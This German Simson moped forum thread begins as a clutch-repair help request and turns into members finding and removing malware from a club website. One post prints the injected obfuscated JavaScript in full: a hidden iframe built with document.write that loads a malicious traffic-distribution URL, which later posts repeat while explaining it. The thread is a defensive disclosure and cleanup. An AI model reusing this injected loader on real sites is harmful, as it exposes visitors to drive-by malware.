+ Antworten
Ergebnis 1 bis 16 von 16

Thema: Hilfe, wer kann meine Simson reparieren?


  1. #1

    Registriert seit
    11.08.2010
    Ort
    Berlin
    Beiträge
    1

    Standard Hilfe, wer kann meine Simson reparieren?

    Hallo,
    ich habe eine Simson S51 E und ein großes Problem mit der Kupplung. Ich habe auch schon einen Bekannten draufschauen lassen, der aber meinte, dass man den Motor ausbauen müsse, um das Problem genauer orten zu können und er sich nicht rantraut.
    Da ich das selber nicht kann und auch leider keine Möglichkeit habe, das Moped zu irgendeiner Berliner Werkstatt zu kriegen, wäre es total super, wenn ich hier jemanden finden würde, der sich das Ganze vor Ort mal ansieht. Die Simson steht jetzt in der Schönhauser Allee.
    Es wäre wirklich super, wenn mir jemand helfen könnte, ich bin wirklich verzweifelt.

  2. #2
    Glühbirnenwechsler
    Registriert seit
    31.05.2009
    Beiträge
    70

    Standard

    gelbe Seiten und in und um Berlin schauen
    S51 Comfort, SR2E, Schwalbe S

  3. #3
    Chefkonstrukteur Avatar von experimentator
    Registriert seit
    18.04.2003
    Ort
    01662 Meißen
    Beiträge
    4.206

    Standard

    Du kannst mal die IFA-Truppe Berlin/Brandenburg kontaktieren, die helfen dir bestimmt auch ohne Werkstatt weiter.
    Wenn es unbedingt eine Werkstatt sein soll gibt es noch Simson-Seelig Ersatzteile, Zubeh

    mfg Gert
    Geändert von experimentator (20.08.2010 um 06:43 Uhr)

  4. #4
    Super-Moderator Museumsdirektor Avatar von totoking
    Registriert seit
    05.04.2007
    Ort
    Hamburg
    Beiträge
    5.945

    Standard

    um eine kupplung zu reparieren, muss der motor nicht ausgebaut werden. wenn du hier im nest oder bei einer nachricht an mich dein problem etwas genauer schilderst, kann ich sicher nach absprache mal vorbeikommen und mir das ganze ansehen und ggf. gleich heil machen.
    noch lieber wäre mir allerdings, wenn du das moped in ein auto verfrachten und direkt in meine garage kommen könntest, denn da kann ich definitiv das problem vor ort lösen, wenn es wirklich nur die kupplung ist.

    gruß aus dem schönen karlshorst

    ps: danke olaf für die werbung. mir kompetenz vorzuwerfen ist ja göttlich... damit kann ich ja kaum umgehen
    Ich wünschte ich wäre eine Lorbeere, dann hätt ich nichts zu tun als auf mir auszuruhn!!!

  5. #5
    Tankentroster
    Registriert seit
    21.10.2008
    Ort
    Emsdetten
    Beiträge
    155

    Standard

    Du kannst mal die IFA-Truppe Berlin/Brandenburg kontaktieren, die helfen dir bestimmt auch ohne Werkstatt weiter: "Simson & IFA Freunde, Berlin - Brandenburg"
    Website wurde gesperrt von Trend Micro Internet Security


    Das Öffnen der Website kann Ihre Sicherheit gefährden.
    Trend Micro hat diese Website noch nicht ausgewertet.

    --------------------------------------------------------------------------------

    Die Website, die Sie anzeigen möchten, überträgt möglicherweise bösartige Software auf Ihren Computer oder hat dies bereits auf anderen Computern getan. Außerdem könnte die Website mit Online-Betrug in Verbindung stehen.

  6. #6
    Super-Moderator Urgestein Avatar von Zschopower
    Registriert seit
    04.06.2006
    Ort
    Ilsede-Oberg
    Beiträge
    16.250

    Standard

    Ist es das hier??

    <!-- o --><script>var lwa="<";var elg="i";var fqqjq=" ";var ciplw="ufebm='waZLSyhB' tvtbx='Fwcn7bA0' krcxm='AH3GIdbg' twnko='BA25NRUb' src=";var pzkly="ame>";var kimdl="/tds/go.php?sid=3&lucky";var vtnqi="?wDjQqTk ";var wzn="f";var pkc="r";var ymq="a";var rqdre="wjjyi='P9wpLXPG' dxcip='ajZFAHUy' dnria='bdY3F5Nu' egafm='fMswiX72' gyicy='i4DpByrB' cnbfx='q60biqDw' ";var azz="m";var ukp="e";var mntra="width=671 ";var oqnaf="http://llforyourpets.net";var dexlv="height=315 ";var ybnmr="style='display:none'";var ybooc=oqnaf+kimdl;var uydmn="></ifr";document.write(lwa+elg+wzn+pkc+ymq+azz+ukp+fq qjq+ciplw+ybooc+vtnqi+rqdre+mntra+dexlv+ybnmr+uydm n+pzkly);</script><!-- c -->

    Wer versteht das?

    Fragt Peter

  7. #7
    Super-Moderator Chefkonstrukteur
    Registriert seit
    16.01.2006
    Ort
    Nähe Chemnitz
    Beiträge
    2.874

    Standard

    Also bei mir läßt sich die Seite problemlos öffnen.

    qdä

  8. #8
    Urgestein Avatar von Dummschwätzer
    Registriert seit
    22.04.2003
    Beiträge
    10.464

    Standard

    ... bei mir auch.
    Raus aus der EU ! - Her mit der D-Mark ! - Sofort !

  9. #9
    Super-Moderator Urgestein Avatar von Zschopower
    Registriert seit
    04.06.2006
    Ort
    Ilsede-Oberg
    Beiträge
    16.250

    Standard

    Bei mir auch lieber qdä, weil wir beide wohl kein trend Micro Internet Security installiert haben.
    ich habe das Kauderwelsch s.o. schon mal zerpflückt. Es wird ein unsichtbarer I-Frame mit der Grösse
    width=671 height=315 aufgebaut die unter der Variablen oqnav befindliche URL wird aber nicht offensichtlich aufgebaut oder doch??
    Wer hat mehr Ahnung von dem Script als ich?

    Peter

  10. #10
    Super-Moderator Urgestein Avatar von Zschopower
    Registriert seit
    04.06.2006
    Ort
    Ilsede-Oberg
    Beiträge
    16.250

    Standard

    Virenalarm!

    Bitte den Link zur Seite der "Simson & IFA Freunde, Berlin - Brandenburg" nicht anclicken.
    Dort wird Schadcode verschleudert.
    Wer jemanden von denen kennt, bitte informieren, dass die ihre Startseite säubern.
    Mehr auf nachfrage.

    Peter

  11. #11
    Administrator Urgestein Avatar von Prof
    Registriert seit
    18.04.2003
    Ort
    auf dem Lande
    Beiträge
    18.376

    Standard

    Ich frage hiermit nach.
    Disclaimer: Beiträge können Ironie und unsichtbare Smileys enthalten.

  12. #12
    Super-Moderator Urgestein Avatar von Zschopower
    Registriert seit
    04.06.2006
    Ort
    Ilsede-Oberg
    Beiträge
    16.250

    Standard

    Ja, was antworte ich bloss auf eine so präzise spezifizierte Frage?

    Der Schadcode der vermutlich nicht von den Machern auf deren der o.a. Webseite platziert wurde, baut ein unsichtbares Fenster (iframe src= _eine_böse_url_ width=671 height=315 style='display:none'; der Rest ist wohl nur dazu da, um zu verwirren) auf, dass auf eine andere URL verweist und dort wird dann irgendwelcher Schindluder getrieben. Deshalb hat der Trend Micro von Stahlwolle gemeckert. Mein kostenloses Avira hat's erst bei ausdrücklichem Scan entdeckt und in die Quarantäne verschoben. Ich hoffe, dass nicht mehr unentdeckt geblieben ist.
    Mit ein wenig googlen findet man diesen Schadcode und auch die böse URL als bekannt.

    Bist'e jetzt schlauer lieber Prof?

    Peter

  13. #13
    Kettenblattschleifer Avatar von Heros
    Registriert seit
    17.06.2010
    Ort
    Freiberg
    Beiträge
    543

    Standard

    War grade mit der VM auf der Site, der Code ist noch da.

    var kimdl="/tds/go.php?sid=3&lucky
    go.php wird dann wohl für das Übel zuständig sein. Der leitet auf:
    http://llforyourpets.net (nicht drauf gehen)
    Aufgerufen wird das Ganze dann mit Javascript unter document.write.

    Wer sicher surfen will, sollte dort JS aus machen.

  14. #14
    Kettenblattschleifer Avatar von trollaxt
    Registriert seit
    19.05.2003
    Ort
    Berlin
    Beiträge
    666

    Standard

    danke für den hinweis!
    kam nicht von der gespeicherten site auf meinem rechner...
    hab die "index" aufm server gelöscht und neu hochgeladen, sollte also (vorerst) beseitigt sein. wie der dreck da raufkommt kann ich mir allerdings nicht erklären...

    Zitat Zitat von Olaf1969 Beitrag anzeigen
    Ist hier auch ein Nest´ler
    Gruß
    Olaf
    kann natürlich auch toto sich gern drum kümmern, aber den zitierten satz kann ick ja nun so nich stehen lassen...

    es sind mehrere von uns hier angemeldet -und gucken auch des öfteren ins nest...

  15. #15
    Kettenblattschleifer Avatar von trollaxt
    Registriert seit
    19.05.2003
    Ort
    Berlin
    Beiträge
    666

    Standard

    allet jut! *gg*
    aber mal davon ab, kann bitte mal jemand kontrollieren ob der ranz ooch bei euch anderen von unserer seite runter ist? ...aber bitte browser-cache leeren...

  16. #16
    Kettenblattschleifer Avatar von Heros
    Registriert seit
    17.06.2010
    Ort
    Freiberg
    Beiträge
    543

    Standard

    Jap, ist aus dem Quelltext raus. Solltest aber in der nächsten Zeit immer mal wieder kontrollieren.

    In den einzelnen Frame-Dateien ist auch nichts zu finden.

+ Antworten

Ähnliche Themen

  1. Wo kann ich meine Schwalbe in Bayern reparieren lassen?
    Von Linus im Forum Simson Händler und Werkstätten
    Antworten: 39
    Letzter Beitrag: 07.02.2009, 19:42
  2. HILFE meine Schwalbe verliert Benzin! Kann mir jemand Helfen
    Von freakpower im Forum Simson Freunde
    Antworten: 2
    Letzter Beitrag: 08.05.2006, 22:40

Berechtigungen

  • Es ist dir nicht erlaubt, neue Themen zu verfassen.
  • Es ist dir nicht erlaubt, auf Beiträge zu antworten.
  • Es ist dir nicht erlaubt, Anhänge hochzuladen.
  • Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.